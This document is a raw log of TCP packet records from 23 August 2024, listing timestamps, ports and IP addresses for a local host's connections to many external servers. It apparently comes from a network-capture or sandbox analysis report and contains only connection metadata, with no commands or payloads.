Aug 23, 2024 18:42:14.089709044 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.089772940 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.089772940 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.089967012 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090015888 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090027094 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090044022 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.090086937 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090099096 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090109110 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.090888977 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090899944 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090912104 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090915918 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.090924025 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.090944052 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.091438055 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.091461897 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.091494083 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.091507912 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.091516972 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.091855049 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.091866970 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.091876984 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.092395067 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.092406988 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.092417955 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.092422962 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.092428923 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.092437983 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.092490911 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.092490911 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.094646931 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.094716072 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.094763994 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.177869081 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.177881956 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.177892923 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.177913904 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.177928925 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.177937984 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.177942038 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.177956104 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.177979946 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178005934 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178033113 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178045034 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178077936 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178097010 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178380013 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178406000 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178416014 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178423882 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178435087 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178462029 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178613901 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178626060 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178637981 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178659916 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178673983 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178685904 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178698063 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.178728104 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.178751945 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179053068 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179069042 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179088116 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179096937 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179100037 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179109097 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179114103 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179132938 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179157972 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179390907 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179430962 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179430962 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179445028 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179469109 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179492950 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179538012 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179549932 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179559946 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179572105 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179575920 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179590940 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179627895 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179658890 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179697990 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179709911 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179723024 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.179727077 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179740906 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.179775000 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.180361986 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180373907 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180383921 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180401087 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.180418968 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.180474043 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180490017 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180501938 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180509090 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.180516005 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180532932 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.180541992 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.180573940 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.180983067 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181015015 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181024075 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.181027889 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181049109 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.181072950 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.181102991 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181114912 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181127071 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181137085 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.181138992 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181152105 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.181155920 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.181191921 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.232760906 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.232821941 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.232851028 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.232863903 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.232896090 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.232916117 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.266172886 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.266233921 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.266243935 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.266295910 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.266325951 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.266392946 CEST	80	49714	199.191.50.83	192.168.2.5
Aug 23, 2024 18:42:14.266433954 CEST	49714	80	192.168.2.5	199.191.50.83
Aug 23, 2024 18:42:14.285836935 CEST	80	49719	154.212.231.82	192.168.2.5
Aug 23, 2024 18:42:14.285918951 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:42:14.301736116 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:14.301861048 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:14.326061010 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:42:14.330967903 CEST	80	49719	154.212.231.82	192.168.2.5
Aug 23, 2024 18:42:14.726733923 CEST	80	49719	154.212.231.82	192.168.2.5
Aug 23, 2024 18:42:14.726821899 CEST	49719	80	192.168.2.5	154.212.231.82
Aug 23, 2024 18:42:14.776570082 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:14.776609898 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:14.776915073 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:14.776962996 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:14.779908895 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:14.820496082 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:15.715642929 CEST	49722	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:15.720566034 CEST	80	49722	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:15.720660925 CEST	49722	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:15.720752001 CEST	49722	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:15.725640059 CEST	80	49722	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:16.166702032 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.166749954 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.166785002 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.166814089 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.166845083 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.166874886 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.166929007 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.166929007 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.166929007 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.166958094 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.166990995 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.167001009 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.167006016 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.167051077 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.167057037 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.167118073 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.167148113 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.167155027 CEST	443	49721	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.167174101 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.167201042 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.167409897 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.167442083 CEST	49721	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.168451071 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.173234940 CEST	80	49707	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.708097935 CEST	80	49707	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.708223104 CEST	49707	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.713399887 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.713440895 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:16.713510036 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.713768005 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:16.713783979 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:17.939580917 CEST	80	49722	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:17.939718962 CEST	49722	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:17.939766884 CEST	80	49722	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:17.939810038 CEST	49722	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:17.939881086 CEST	49722	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:17.940356016 CEST	80	49722	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:17.940396070 CEST	49722	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:17.941365004 CEST	49724	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:17.941695929 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:17.941772938 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:17.943509102 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:17.943522930 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:17.943752050 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:17.943810940 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:17.944118977 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:17.947592974 CEST	80	49722	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:17.951879025 CEST	80	49724	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:17.951955080 CEST	49724	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:17.952111959 CEST	49724	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:17.957175970 CEST	80	49724	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:17.988497019 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:19.845566034 CEST	80	49724	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:19.845635891 CEST	49724	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:19.845738888 CEST	49724	80	192.168.2.5	85.17.31.122
Aug 23, 2024 18:42:19.850807905 CEST	80	49724	85.17.31.122	192.168.2.5
Aug 23, 2024 18:42:20.194463968 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.194515944 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.194545984 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.194581985 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.194583893 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.194597960 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.194611073 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.194650888 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.194662094 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.194669008 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.194694042 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.194709063 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.194969893 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.195022106 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.195089102 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.195123911 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.195152044 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.195158005 CEST	443	49723	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:20.195168972 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:20.195204973 CEST	49723	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:24.303153992 CEST	80	49717	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:24.303230047 CEST	49717	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:24.303402901 CEST	49717	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:24.305166960 CEST	49725	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:24.308681011 CEST	80	49717	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:24.310136080 CEST	80	49725	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:24.310223103 CEST	49725	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:24.310411930 CEST	49725	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:24.316133976 CEST	80	49725	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:25.750631094 CEST	80	49725	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:25.750814915 CEST	49725	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:25.750869989 CEST	49725	80	192.168.2.5	172.234.222.143
Aug 23, 2024 18:42:25.756083012 CEST	80	49725	172.234.222.143	192.168.2.5
Aug 23, 2024 18:42:25.879391909 CEST	49728	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:25.884418964 CEST	80	49728	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:25.884507895 CEST	49728	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:25.884602070 CEST	49728	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:25.889935017 CEST	80	49728	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:26.894043922 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:26.899358034 CEST	80	49730	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:26.899415016 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:26.906724930 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:26.911755085 CEST	80	49730	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:26.984715939 CEST	49731	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:26.989587069 CEST	80	49731	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:26.989662886 CEST	49731	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:27.004400015 CEST	49731	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:27.009263992 CEST	80	49731	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:27.207014084 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:42:27.212241888 CEST	80	49733	103.150.11.230	192.168.2.5
Aug 23, 2024 18:42:27.212316036 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:42:27.212459087 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:42:27.219257116 CEST	80	49733	103.150.11.230	192.168.2.5
Aug 23, 2024 18:42:27.546565056 CEST	80	49731	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:27.546643019 CEST	49731	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:27.547528982 CEST	80	49731	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:27.547589064 CEST	49731	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:27.547784090 CEST	49731	80	192.168.2.5	18.208.156.248
Aug 23, 2024 18:42:27.554615974 CEST	80	49731	18.208.156.248	192.168.2.5
Aug 23, 2024 18:42:27.783406019 CEST	80	49708	162.255.119.102	192.168.2.5
Aug 23, 2024 18:42:27.783485889 CEST	49708	80	192.168.2.5	162.255.119.102
Aug 23, 2024 18:42:28.191149950 CEST	80	49733	103.150.11.230	192.168.2.5
Aug 23, 2024 18:42:28.191274881 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:42:28.197144985 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:28.201951981 CEST	8001	49736	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:28.202020884 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:28.202159882 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:28.207557917 CEST	8001	49736	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:28.454253912 CEST	80	49730	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:28.454333067 CEST	49730	80	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.463259935 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.463285923 CEST	443	49737	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:28.463351011 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.463920116 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.463931084 CEST	443	49737	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:28.931149960 CEST	443	49737	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:28.931238890 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.944011927 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.944041967 CEST	443	49737	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:28.944310904 CEST	443	49737	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:28.944384098 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.944885969 CEST	49737	443	192.168.2.5	188.114.96.3
Aug 23, 2024 18:42:28.988507032 CEST	443	49737	188.114.96.3	192.168.2.5
Aug 23, 2024 18:42:29.305680037 CEST	8001	49736	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:29.305775881 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.305969000 CEST	8001	49736	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:29.306432009 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.306448936 CEST	8001	49736	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:29.306690931 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.307038069 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:42:29.311917067 CEST	80	49733	103.150.11.230	192.168.2.5
Aug 23, 2024 18:42:29.671279907 CEST	80	49733	103.150.11.230	192.168.2.5
Aug 23, 2024 18:42:29.671761990 CEST	49733	80	192.168.2.5	103.150.11.230
Aug 23, 2024 18:42:29.674015045 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.674108982 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.674463034 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.678972006 CEST	8001	49736	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:29.679050922 CEST	49736	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.679419041 CEST	8001	49740	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:29.679630995 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.679687977 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:29.684576988 CEST	8001	49740	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:30.796144009 CEST	8001	49740	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:30.796216965 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:30.796372890 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:30.796395063 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:30.796534061 CEST	8001	49740	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:30.799570084 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:30.801294088 CEST	8001	49740	106.15.137.66	192.168.2.5
Aug 23, 2024 18:42:30.801384926 CEST	49740	8001	192.168.2.5	106.15.137.66
Aug 23, 2024 18:42:36.380106926 CEST	80	49728	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:36.380225897 CEST	49728	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:36.380330086 CEST	49728	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:36.382088900 CEST	49741	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:36.385164022 CEST	80	49728	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:36.386939049 CEST	80	49741	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:36.387025118 CEST	49741	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:36.387193918 CEST	49741	80	192.168.2.5	13.248.169.48
Aug 23, 2024 18:42:36.392520905 CEST	80	49741	13.248.169.48	192.168.2.5
Aug 23, 2024 18:42:46.836781979 CEST	60684	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:46.841840029 CEST	80	60684	3.64.163.50	192.168.2.5
Aug 23, 2024 18:42:46.842000008 CEST	60684	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:46.849085093 CEST	60684	80	192.168.2.5	3.64.163.50
Aug 23, 2024 18:42:46.853905916 CEST	80	60684	3.64.163.50	192.168.2.5
